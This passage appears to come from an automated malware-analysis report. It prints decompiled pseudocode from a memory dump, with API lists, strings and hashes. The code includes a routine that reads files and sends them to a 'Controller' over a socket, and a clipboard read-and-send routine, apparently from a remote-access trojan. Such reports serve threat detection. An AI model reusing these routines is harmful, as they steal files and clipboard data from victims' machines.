                      																			goto L72;
                      																		} else {
                      																			E007801F5( *((intOrPtr*)(_t302 + _t138 * 4)));
                      																			_t276 = _v16;
                      																			__eflags = _v9 - _t221;
                      																			if(_v9 != _t221) {
                      																				while(1) {
                      																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                      																					if( *(_t302 + _t276 * 4) == _t221) {
                      																						break;
                      																					}
                      																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                      																					_t276 = _t276 + 1;
                      																					__eflags = _t276;
                      																				}
                      																				_push(4);
                      																				_push(_t276);
                      																				_t303 = E00787D55(_t302);
                      																				E007801F5(_t221);
                      																				_t322 = _t322 + 0x10;
                      																				_t142 = _t288;
                      																				__eflags = _t303;
                      																				if(_t303 != 0) {
                      																					L77:
                      																					 *0x7ab4d4 = _t303;
                      																				}
                      																			} else {
                      																				_t142 = _v0;
                      																				_t288 = _t221;
                      																				 *(_t302 + _t276 * 4) = _t142;
                      																			}
                      																			__eflags = _a4 - _t221;
                      																			if(_a4 == _t221) {
                      																				goto L56;
                      																			} else {
                      																				_t254 = _t142;
                      																				_t81 = _t254 + 2; // 0x2
                      																				_t284 = _t81;
                      																				do {
                      																					_t143 =  *_t254;
                      																					_t254 = _t254 + 2;
                      																					__eflags = _t143 - _t221;
                      																				} while (_t143 != _t221);
                      																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                      																				_v16 = _t82;
                      																				_t304 = E0077F348(_t254 - _t284 >> 1, _t82, 2);
                      																				_pop(_t258);
                      																				__eflags = _t304;
                      																				if(_t304 == 0) {
                      																					L85:
                      																					E007801F5(_t304);
                      																					goto L56;
                      																				} else {
                      																					_t148 = E007815D4(_t304, _v16, _v0);
                      																					_t323 = _t322 + 0xc;
                      																					__eflags = _t148;
                      																					if(_t148 != 0) {
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						E0077698A();
                      																						asm("int3");
                      																						_push(_t316);
                      																						_t317 = _t323;
                      																						_push(_t288);
                      																						_t290 = _v92;
                      																						__eflags = _t290;
                      																						if(_t290 != 0) {
                      																							_t260 = 0;
                      																							_t150 = _t290;
                      																							__eflags =  *_t290;
                      																							if( *_t290 != 0) {
                      																								do {
                      																									_t150 =  &(_t150[1]);
                      																									_t260 = _t260 + 1;
                      																									__eflags =  *_t150;
                      																								} while ( *_t150 != 0);
                      																							}
                      																							_t93 = _t260 + 1; // 0x2
                      																							_t305 = E0077F348(_t260, _t93, 4);
                      																							_t262 = _t304;
                      																							__eflags = _t305;
                      																							if(_t305 == 0) {
                      																								L102:
                      																								E0077F949(_t221, _t284, _t290, _t305);
                      																								goto L103;
                      																							} else {
                      																								__eflags =  *_t290;
                      																								if( *_t290 == 0) {
                      																									L100:
                      																									E007801F5(0);
                      																									_t175 = _t305;
                      																									goto L101;
                      																								} else {
                      																									_push(_t221);
                      																									_t221 = _t305 - _t290;
                      																									__eflags = _t221;
                      																									do {
                      																										_t271 =  *_t290;
                      																										_t94 = _t271 + 1; // 0x5
                      																										_t284 = _t94;
                      																										do {
                      																											_t176 =  *_t271;
                      																											_t271 = _t271 + 1;
                      																											__eflags = _t176;
                      																										} while (_t176 != 0);
                      																										_t262 = _t271 - _t284;
                      																										_t95 = _t262 + 1; // 0x6
                      																										_v16 = _t95;
                      																										 *(_t221 + _t290) = E0077F348(_t262, _t95, 1);
                      																										E007801F5(0);
                      																										_t323 = _t323 + 0xc;
                      																										__eflags =  *(_t221 + _t290);
                      																										if( *(_t221 + _t290) == 0) {
                      																											goto L102;
                      																										} else {
                      																											_t180 = E00781916( *(_t221 + _t290), _v16,  *_t290);
                      																											_t323 = _t323 + 0xc;
                      																											__eflags = _t180;
                      																											if(_t180 != 0) {
                      																												L103:
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												E0077698A();
                      																												asm("int3");
                      																												_push(_t317);
                      																												_t318 = _t323;
                      																												_push(_t262);
                      																												_push(_t262);
                      																												_push(_t290);
                      																												_t291 = _v128;
                      																												__eflags = _t291;
                      																												if(_t291 != 0) {
                      																													_push(_t221);
                      																													_t223 = 0;
                      																													_t156 = _t291;
                      																													_t263 = 0;
                      																													_v20 = 0;
                      																													_push(_t305);
                      																													__eflags =  *_t291;
                      																													if( *_t291 != 0) {
                      																														do {
                      																															_t156 =  &(_t156[1]);
                      																															_t263 = _t263 + 1;
                      																															__eflags =  *_t156;
                      																														} while ( *_t156 != 0);
                      																													}
                      																													_t104 = _t263 + 1; // 0x2
                      																													_t306 = E0077F348(_t263, _t104, 4);
                      																													__eflags = _t306;
                      																													if(_t306 == 0) {
                      																														L119:
                      																														E0077F949(_t223, _t284, _t291, _t306);
                      																														goto L120;
                      																													} else {
                      																														__eflags =  *_t291 - _t223;
                      																														if( *_t291 == _t223) {
                      																															L117:
                      																															E007801F5(_t223);
                      																															_t167 = _t306;
                      																															goto L118;
                      																														} else {
                      																															_t223 = _t306 - _t291;
                      																															__eflags = _t223;
                      																															do {
                      																																_t267 =  *_t291;
                      																																_t105 = _t267 + 2; // 0x6
                      																																_t284 = _t105;
                      																																do {
                      																																	_t168 =  *_t267;
                      																																	_t267 = _t267 + 2;
                      																																	__eflags = _t168 - _v20;
                      																																} while (_t168 != _v20);
                      																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                      																																_v24 = _t107;
                      																																 *(_t223 + _t291) = E0077F348(_t267 - _t284 >> 1, _t107, 2);
                      																																E007801F5(0);
                      																																_t323 = _t323 + 0xc;
                      																																__eflags =  *(_t223 + _t291);
                      																																if( *(_t223 + _t291) == 0) {
                      																																	goto L119;
                      																																} else {
                      																																	_t173 = E007815D4( *(_t223 + _t291), _v24,  *_t291);
                      																																	_t323 = _t323 + 0xc;
                      																																	__eflags = _t173;
                      																																	if(_t173 != 0) {
                      																																		L120:
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		E0077698A();
                      																																		asm("int3");
                      																																		_push(_t318);
                      																																		_push(_t223);
                      																																		_push(_t306);
                      																																		_push(_t291);
                      																																		_t292 =  *0x7ab4d0; // 0x2d19f60
                      																																		_t307 = _t292;
                      																																		__eflags =  *_t292;
                      																																		if( *_t292 == 0) {
                      																																			L127:
                      																																			_t308 = _t307 - _t292;
                      																																			__eflags = _t308;
                      																																			_t310 =  ~(_t308 >> 2);
                      																																		} else {
                      																																			_t225 = _v8;
                      																																			do {
                      																																				_t163 = E007844C3(_v12,  *_t307, _t225);
                      																																				_t323 = _t323 + 0xc;
                      																																				__eflags = _t163;
                      																																				if(_t163 != 0) {
                      																																					goto L126;
                      																																				} else {
                      																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                      																																					__eflags = _t165 - 0x3d;
                      																																					if(_t165 == 0x3d) {
                      																																						L129:
                      																																						_t310 = _t307 - _t292 >> 2;
                      																																					} else {
                      																																						__eflags = _t165;
                      																																						if(_t165 == 0) {
                      																																							goto L129;
                      																																						} else {
                      																																							goto L126;
                      																																						}
                      																																					}
                      																																				}
                      																																				goto L128;
                      																																				L126:
                      																																				_t307 =  &(_t307[1]);
                      																																				__eflags =  *_t307;
                      																																			} while ( *_t307 != 0);
                      																																			goto L127;
                      																																		}
                      																																		L128:
                      																																		return _t310;
                      																																	} else {
                      																																		goto L115;
                      																																	}
                      																																}
                      																																goto L130;
                      																																L115:
                      																																_t291 = _t291 + 4;
                      																																__eflags =  *_t291 - _t173;
                      																															} while ( *_t291 != _t173);
                      																															_t223 = 0;
                      																															__eflags = 0;
                      																															goto L117;
                      																														}
                      																													}
                      																												} else {
                      																													_t167 = 0;
                      																													L118:
                      																													return _t167;
                      																												}
                      																											} else {
                      																												goto L98;
                      																											}
                      																										}
                      																										goto L130;
                      																										L98:
                      																										_t290 = _t290 + 4;
                      																										__eflags =  *_t290 - _t180;
                      																									} while ( *_t290 != _t180);
                      																									goto L100;
                      																								}
                      																							}
                      																						} else {
                      																							_t175 = 0;
                      																							L101:
                      																							return _t175;
                      																						}
                      																					} else {
                      																						_t274 =  &(_t304[_v20 + 1]);
                      																						 *(_t274 - 2) = _t148;
                      																						asm("sbb eax, eax");
                      																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                      																						__eflags = _t185;
                      																						if(_t185 == 0) {
                      																							_t186 = E0077A504();
                      																							_t221 = _t221 | 0xffffffff;
                      																							__eflags = _t221;
                      																							 *_t186 = 0x2a;
                      																						}
                      																						goto L85;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	}
                      																} else {
                      																	_t191 =  *0x7ab4d0; // 0x2d19f60
                      																	__eflags = _a4 - _t221;
                      																	if(_a4 == _t221) {
                      																		L58:
                      																		__eflags = _t246;
                      																		if(_t246 != 0) {
                      																			goto L56;
                      																		} else {
                      																			__eflags = _t191;
                      																			if(_t191 != 0) {
                      																				L62:
                      																				 *0x7ab4d4 = E0077F348(_t246, 1, 4);
                      																				E007801F5(_t221);
                      																				_t322 = _t322 + 0xc;
                      																				goto L63;
                      																			} else {
                      																				 *0x7ab4d0 = E0077F348(_t246, 1, 4);
                      																				E007801F5(_t221);
                      																				_t322 = _t322 + 0xc;
                      																				__eflags =  *0x7ab4d0 - _t221; // 0x2d19f60
                      																				if(__eflags == 0) {
                      																					goto L55;
                      																				} else {
                      																					_t302 =  *0x7ab4d4; // 0x0
                      																					__eflags = _t302;
                      																					if(_t302 != 0) {
                      																						goto L64;
                      																					} else {
                      																						goto L62;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	} else {
                      																		__eflags = _t191;
                      																		if(_t191 == 0) {
                      																			goto L58;
                      																		} else {
                      																			_t196 = L0077D3FB(_t221);
                      																			__eflags = _t196;
                      																			if(_t196 != 0) {
                      																				L63:
                      																				_t302 =  *0x7ab4d4; // 0x0
                      																				__eflags = _t302;
                      																				if(_t302 == 0) {
                      																					L55:
                      																					_t221 = _t220 | 0xffffffff;
                      																					__eflags = _t221;
                      																					L56:
                      																					E007801F5(_t288);
                      																					_t136 = _t221;
                      																					goto L57;
                      																				} else {
                      																					goto L64;
                      																				}
                      																			} else {
                      																				goto L54;
                      																			}
                      																		}
                      																	}
                      																}
                      															}
                      														}
                      													} else {
                      														_t197 = E0077A504();
                      														 *_t197 = 0x16;
                      														_t136 = _t197 | 0xffffffff;
                      														L57:
                      														return _t136;
                      													}
                      												} else {
                      													_t280 = _v16 + 1 + _t300 - _a4;
                      													asm("sbb eax, eax");
                      													 *(_t280 - 1) = _t218;
                      													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                      													__eflags = _t204;
                      													if(_t204 == 0) {
                      														_t205 = E0077A504();
                      														_t218 = _t218 | 0xffffffff;
                      														__eflags = _t218;
                      														 *_t205 = 0x2a;
                      													}
                      													goto L42;
                      												}
                      											}
                      										}
                      									}
                      								}
                      							} else {
                      								__eflags = _a8;
                      								if(_a8 == 0) {
                      									L14:
                      									__eflags = _t120;
                      									if(_t120 == 0) {
                      										 *0x7ab4d0 = E0077F348(_t231, 1, 4);
                      										E007801F5(_t218);
                      										_t298 =  *0x7ab4d0; // 0x2d19f60
                      										_t320 = _t320 + 0xc;
                      										__eflags = _t298;
                      										if(_t298 == 0) {
                      											goto L11;
                      										} else {
                      											__eflags =  *0x7ab4d4 - _t218; // 0x0
                      											if(__eflags != 0) {
                      												goto L20;
                      											} else {
                      												 *0x7ab4d4 = E0077F348(_t231, 1, 4);
                      												E007801F5(_t218);
                      												_t320 = _t320 + 0xc;
                      												__eflags =  *0x7ab4d4 - _t218; // 0x0
                      												if(__eflags == 0) {
                      													goto L11;
                      												} else {
                      													goto L19;
                      												}
                      											}
                      										}
                      									} else {
                      										_t218 = 0;
                      										goto L12;
                      									}
                      								} else {
                      									__eflags =  *0x7ab4d4 - _t218; // 0x0
                      									if(__eflags == 0) {
                      										goto L14;
                      									} else {
                      										_t214 = L0077D3F6(0);
                      										__eflags = _t214;
                      										if(_t214 != 0) {
                      											L19:
                      											_t298 =  *0x7ab4d0; // 0x2d19f60
                      											L20:
                      											__eflags = _t298;
                      											if(_t298 == 0) {
                      												L11:
                      												_t218 = _t217 | 0xffffffff;
                      												__eflags = _t218;
                      												L12:
                      												E007801F5(_t286);
                      												_t119 = _t218;
                      												goto L13;
                      											} else {
                      												goto L21;
                      											}
                      										} else {
                      											goto L10;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				} else {
                      					_t215 = E0077A504();
                      					 *_t215 = 0x16;
                      					_t119 = _t215 | 0xffffffff;
                      					L13:
                      					return _t119;
                      				}
                      				L130:
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                      • String ID:
                      • API String ID: 2719235668-0
                      • Opcode ID: a3e0a4058cd226b1edd5226457fc115062e589be7fb9077868acc83deea5f33f
                      • Instruction ID: b77a71ff99d1a07339e4a172cf55d449581803c5cb3d6c4a106d136c23e0a4b9
                      • Opcode Fuzzy Hash: a3e0a4058cd226b1edd5226457fc115062e589be7fb9077868acc83deea5f33f
                      • Instruction Fuzzy Hash: E9D15C71989304AFDF29BF748C89A7E7BA4AF05360F64816DF90697292E73DD900C790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E007464A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                      				void* _v12;
                      				union _LARGE_INTEGER _v16;
                      				struct _OVERLAPPED* _v20;
                      				long _v24;
                      				long _v28;
                      				intOrPtr _v32;
                      				long _v36;
                      				struct _OVERLAPPED* _v40;
                      				union _LARGE_INTEGER* _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				struct %anon52 _v64;
                      				intOrPtr _v68;
                      				struct %anon52 _v80;
                      				union _LARGE_INTEGER _v84;
                      				intOrPtr _v88;
                      				char _v112;
                      				char _v136;
                      				char _v160;
                      				char _v184;
                      				char _v208;
                      				char _v232;
                      				char _v256;
                      				char _v280;
                      				char _v304;
                      				char _v328;
                      				char _v352;
                      				char _v376;
                      				char _v400;
                      				char _v424;
                      				char _v448;
                      				char _v472;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				struct %anon52 _t117;
                      				void* _t119;
                      				void* _t126;
                      				long _t136;
                      				void* _t137;
                      				signed int _t138;
                      				struct _OVERLAPPED* _t145;
                      				signed int _t148;
                      				void* _t154;
                      				void* _t156;
                      				void* _t157;
                      				void* _t173;
                      				long _t198;
                      				signed int _t203;
                      				void* _t216;
                      				union _LARGE_INTEGER _t280;
                      				intOrPtr _t281;
                      				union _LARGE_INTEGER* _t295;
                      				void* _t297;
                      				void* _t301;
                      				void* _t302;
                      				void* _t303;
                      				void* _t304;
                      				void* _t305;
                      
                      				_t278 = __edx;
                      				_v68 = __ecx;
                      				E0074498B(__ecx);
                      				_t302 = _t301 - 0x10;
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				_t299 = _v68;
                      				E00744A08(__edx);
                      				_v28 = 0x186a0;
                      				_v20 = 0;
                      				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                      				_t310 = _t297 - 0xffffffff;
                      				if(_t297 != 0xffffffff) {
                      					_v80.LowPart = 0;
                      					_v80.HighPart = 0;
                      					__imp__GetFileSizeEx(_t297,  &_v80);
                      					_t203 = _v80.HighPart;
                      					_t117 = _v80;
                      					_v48 = _t203;
                      					_v32 = _t203;
                      					_v52 = _t117;
                      					_v16.LowPart = _t117;
                      					E0074427F(0,  &_v112, _a4);
                      					_t119 = E0075733B( &_v136,  &_v112);
                      					_t303 = _t302 - 0x18;
                      					_t280 = "Uploading file to Controller: ";
                      					E007475C2(0, _t303, _t280, _t297, __eflags, _t119);
                      					_t304 = _t303 - 0x14;
                      					E00742084(0, _t304, "[Info]");
                      					E00756C80(0, _t297);
                      					_t305 = _t304 + 0x30;
                      					E00741FC7();
                      					E00741EF0();
                      					_v36 = 1;
                      					_v40 = 0;
                      					_t126 = E00790880(_v52, _v48, 0x186a0, 0);
                      					_t210 = _t280;
                      					asm("xorps xmm0, xmm0");
                      					_v88 = _t126 + 1;
                      					asm("adc ecx, ebx");
                      					asm("movlpd [ebp-0x3c], xmm0");
                      					_v84.LowPart = _t280;
                      					__eflags = _v48;
                      					if(__eflags < 0) {
                      						L17:
                      						CloseHandle(_t297);
                      						E00744E0B(_t299);
                      						_t198 = 1;
                      					} else {
                      						if(__eflags > 0) {
                      							L5:
                      							_v44 = _v64.HighPart.LowPart;
                      							_v64.HighPart.LowPart = _v64;
                      							_t136 = 0x186a0;
                      							goto L6;
                      							do {
                      								do {
                      									L6:
                      									_t281 = _v32;
                      									__eflags = _v20 - _t281;
                      									if(__eflags >= 0) {
                      										_t210 = _v16.LowPart;
                      										if(__eflags > 0) {
                      											L9:
                      											_t136 = _t210;
                      											_v20 = _t281;
                      											_v28 = _t136;
                      										} else {
                      											__eflags = _t136 - _t210;
                      											if(__eflags > 0) {
                      												goto L9;
                      											}
                      										}
                      									}
                      									_push(_t136);
                      									_t137 = E0076F4C6(_t210, _t281, _t299, __eflags);
                      									_push(0);
                      									_v12 = _t137;
                      									_v24 = 0;
                      									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                      									__eflags = _t138;
                      									if(_t138 == 0) {
                      										_t306 = _t305 - 0x18;
                      										_t216 = _t305 - 0x18;
                      										_push("SetFilePointerEx error");
                      										goto L23;
                      									} else {
                      										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                      										__eflags = _t148;
                      										if(_t148 == 0) {
                      											_t306 = _t305 - 0x18;
                      											_t216 = _t305 - 0x18;
                      											_push("ReadFile error");
                      											L23:
                      											E00742084(0, _t216);
                      											E00742084(0, _t306 - 0x18, "[ERROR]");
                      											E00756C80(0, _t297);
                      											E0076F4CF(_v12);
                      											CloseHandle(_t297);
                      											goto L24;
                      										} else {
                      											__eflags = _v24;
                      											if(__eflags == 0) {
                      												E0076F4CF(_v12);
                      												CloseHandle(_t297);
                      												E00744E0B(_t299);
                      												_t145 = 1;
                      												goto L25;
                      											} else {
                      												E0074427F(0,  &_v112, _a4);
                      												_t154 = E007420AB(0,  &_v472, _t281, __eflags, _v12, _v24);
                      												_t305 = _t305 - 0x18;
                      												_t156 = E00757260(0x7ac238,  &_v448, _v88, _v84);
                      												_t157 = E00757260(0x7ac238,  &_v424, _v36, _v40);
                      												E00742F1D(_t305, E00742F93(0x7ac238,  &_v136, E00742F93(0x7ac238,  &_v160, E00742F93(0x7ac238,  &_v184, E00742F1D( &_v208, E00742F93(0x7ac238,  &_v232, E00742F1D( &_v256, E00742F93(0x7ac238,  &_v280, E00742F93(0x7ac238,  &_v304, E00742F93(0x7ac238,  &_v328, E00742F93(0x7ac238,  &_v352, E00742F93(0x7ac238,  &_v376, E0075739C(0x7ac238,  &_v400,  &_v112), __eflags, 0x7ac238), __eflags,  &_a8), __eflags, 0x7ac238), __eflags,  &_a32), __eflags, 0x7ac238), _t157), __eflags, 0x7ac238), _t156), __eflags, 0x7ac238), __eflags,  &_a56), __eflags, 0x7ac238), _t154);
                      												_t299 = _v68;
                      												_push(0x52);
                      												_t173 = E00744AA4(0x7ac238, _v68, _t171, __eflags);
                      												__eflags = _t173 - 0xffffffff;
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741FC7();
                      												E00741EF0();
                      												__eflags = 0x7ac200 | _t173 == 0xffffffff;
                      												if((0x7ac200 | _t173 == 0xffffffff) != 0) {
                      													E00744E0B(_t299);
                      													CloseHandle(_t297);
                      													E0076F4CF(_v12);
                      													_t198 = 0;
                      												} else {
                      													goto L14;
                      												}
                      											}
                      										}
                      									}
                      									goto L18;
                      									L14:
                      									E0076F4CF(_v12);
                      									_t136 = _v28;
                      									_v16.LowPart = _v16 - _t136;
                      									_t295 = _v44;
                      									asm("sbb ecx, [ebp-0x10]");
                      									_v36 = _v36 + 1;
                      									_push(0);
                      									_pop(0);
                      									asm("adc [ebp-0x24], ebx");
                      									_t210 = _v64.HighPart.LowPart + _t136;
                      									_v64.HighPart = _t210;
                      									asm("adc edx, [ebp-0x10]");
                      									_v44 = _t295;
                      									__eflags = _t295 - _v48;
                      								} while (__eflags < 0);
                      								if(__eflags > 0) {
                      									goto L17;
                      								} else {
                      									goto L16;
                      								}
                      								goto L18;
                      								L16:
                      								__eflags = _t210 - _v52;
                      							} while (_t210 < _v52);
                      							goto L17;
                      						} else {
                      							__eflags = _v52;
                      							if(_v52 <= 0) {
                      								goto L17;
                      							} else {
                      								goto L5;
                      							}
                      						}
                      					}
                      				} else {
                      					E007420EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                      					_push(0x53);
                      					E00744AA4(0, 0x7ac2e8, _t278, _t310);
                      					L24:
                      					E00744E0B(_t299);
                      					_t145 = 0;
                      					L25:
                      					_t198 = _t145;
                      				}
                      				L18:
                      				E00741FC7();
                      				E00741FC7();
                      				E00741FC7();
                      				return _t198;
                      			}

                      APIs
                        • Part of subcall function 00744A08: connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007464ED
                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00746524
                      • __aulldiv.LIBCMT ref: 007465A6
                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00746614
                      • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0074662F
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                        • Part of subcall function 00744E0B: closesocket.WS2_32(?), ref: 00744E11
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                      • API String ID: 1319223106-2190262076
                      • Opcode ID: e117eca8f368c2453e13d105699e296c9a17afebceecae167163bd79dbb31009
                      • Instruction ID: ae95c942760a3fb21661aaa475cae4252ac8cc127bfab7b2b374bd2b2f682de6
                      • Opcode Fuzzy Hash: e117eca8f368c2453e13d105699e296c9a17afebceecae167163bd79dbb31009
                      • Instruction Fuzzy Hash: 2BC16D31D00218DBCF18FBA4DC869EEB7B5BF46310F90816AF415A6291EF385E89DB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00752CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                      				void* __ebx;
                      				int _t10;
                      				void* _t20;
                      				void* _t22;
                      				void* _t31;
                      				struct HWND__* _t38;
                      				void* _t57;
                      				void* _t61;
                      				void* _t64;
                      				void* _t66;
                      
                      				_t55 = __edx;
                      				_t10 = OpenClipboard(_t38);
                      				_t68 = _t10;
                      				if(_t10 != 0) {
                      					EmptyClipboard();
                      					E00741E49( &_a16, _t55, _t68, _t38);
                      					_t57 = GlobalAlloc(0x2000, E00742489() + 2);
                      					_t20 = GlobalLock(_t57);
                      					E00741E49( &_a12, _t55, _t68, _t38);
                      					_t22 = E00742489();
                      					E007724E0(_t20, E00741F95(E00741E49( &_a8, _t55, _t68, _t38)), _t22);
                      					_t66 = _t64 + 0xc;
                      					GlobalUnlock(_t57);
                      					SetClipboardData(0xd, _t57);
                      					CloseClipboard();
                      					if(OpenClipboard(_t38) != 0) {
                      						_t61 = GetClipboardData(0xd);
                      						_t31 = GlobalLock(_t61);
                      						GlobalUnlock(_t61);
                      						CloseClipboard();
                      						_t50 =  !=  ? _t31 : 0x79f724;
                      						E0074427F(_t38,  &_a36,  !=  ? _t31 : 0x79f724);
                      						_t55 =  &_a32;
                      						E0075739C(_t38, _t66 - 0x18,  &_a32);
                      						_push(0x6b);
                      						E00744AA4(_t38, 0x7ac780,  &_a32, _t31);
                      						E00741EF0();
                      					}
                      				}
                      				_t7 =  &_a16; // 0x744538
                      				E00741E74(_t7, _t55);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}

                      APIs
                      • OpenClipboard.USER32 ref: 00752CEF
                      • EmptyClipboard.USER32 ref: 00752CFD
                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00752D1D
                      • GlobalLock.KERNEL32 ref: 00752D26
                      • GlobalUnlock.KERNEL32(00000000), ref: 00752D5C
                      • SetClipboardData.USER32 ref: 00752D65
                      • CloseClipboard.USER32 ref: 00752D82
                      • OpenClipboard.USER32 ref: 00752D89
                      • GetClipboardData.USER32 ref: 00752D99
                      • GlobalLock.KERNEL32 ref: 00752DA2
                      • GlobalUnlock.KERNEL32(00000000), ref: 00752DAB
                      • CloseClipboard.USER32 ref: 00752DB1
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                      • String ID: 8Et
                      • API String ID: 3520204547-257909599
                      • Opcode ID: 9c1706580da50761076ecff9965c411e1476b4c7012696e3bb07882a0ad61aa8
                      • Instruction ID: 159f20e4a50c11a40e5cea98ccf1c1d9e47644748684718ab0c36d0ce0fcb2b1
                      • Opcode Fuzzy Hash: 9c1706580da50761076ecff9965c411e1476b4c7012696e3bb07882a0ad61aa8
                      • Instruction Fuzzy Hash: 4C21B735144600EBD304BBB0DC4EABE76A8BF95342F40442EF906C61A2EF2C4E4AC625
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 64%
                      			E00758E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				struct tagPOINT _v12;
                      				void* _t16;
                      				struct HMENU__* _t17;
                      				void* _t20;
                      				void* _t24;
                      
                      				_t16 = _a8 - 1;
                      				if(_t16 == 0) {
                      					_t17 = CreatePopupMenu();
                      					 *0x7abeb8 = _t17;
                      					AppendMenuA(_t17, 0, 0, "Close");
                      					L15:
                      					return 0;
                      				}
                      				_t20 = _t16 - 0x110;
                      				if(_t20 == 0) {
                      					if(_a12 != 0) {
                      						goto L15;
                      					}
                      					Shell_NotifyIconA(2, 0x7abec0);
                      					ExitProcess(0);
                      				}
                      				if(_t20 == 0x2f0) {
                      					_t24 = _a16 - 0x201;
                      					if(_t24 == 0) {
                      						if(IsWindowVisible( *0x7abebc) == 0) {
                      							ShowWindow( *0x7abebc, 9);
                      							SetForegroundWindow( *0x7abebc);
                      						} else {
                      							ShowWindow( *0x7abebc, 0);
                      						}
                      						goto L15;
                      					}
                      					if(_t24 == 3) {
                      						GetCursorPos( &_v12);
                      						SetForegroundWindow(_a4);
                      						TrackPopupMenu( *0x7abeb8, 0, _v12, _v12.y, 0, _a4, 0);
                      						goto L15;
                      					}
                      					_push(_a16);
                      					_push(_a12);
                      					_push(0x401);
                      					L7:
                      					return DefWindowProcA(_a4, ??, ??, ??);
                      				}
                      				_push(_a16);
                      				_push(_a12);
                      				_push(_a8);
                      				goto L7;
                      			}

                      APIs
                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 00758EA5
                      • GetCursorPos.USER32(?), ref: 00758EB4
                      • SetForegroundWindow.USER32(?), ref: 00758EBD
                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00758ED7
                      • Shell_NotifyIconA.SHELL32(00000002,007ABEC0), ref: 00758F28
                      • ExitProcess.KERNEL32 ref: 00758F30
                      • CreatePopupMenu.USER32 ref: 00758F36
                      • AppendMenuA.USER32 ref: 00758F4B
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                      • String ID: Close
                      • API String ID: 1657328048-3535843008
                      • Opcode ID: 34f18663e024f4f6e9dffd563dd172d2bad1aa7e5e43d5a2cc4247bc82b0d55a
                      • Instruction ID: 49e58a0339e4e114c563eed3f77f2f8e459275a1a1a5038d856a08e48632fb4b
                      • Opcode Fuzzy Hash: 34f18663e024f4f6e9dffd563dd172d2bad1aa7e5e43d5a2cc4247bc82b0d55a
                      • Instruction Fuzzy Hash: 95211B31148109FFDF455FA4EC0EAAA3B76EB08702F00C219FA05A41B1DFB99E659B19
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E0077F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
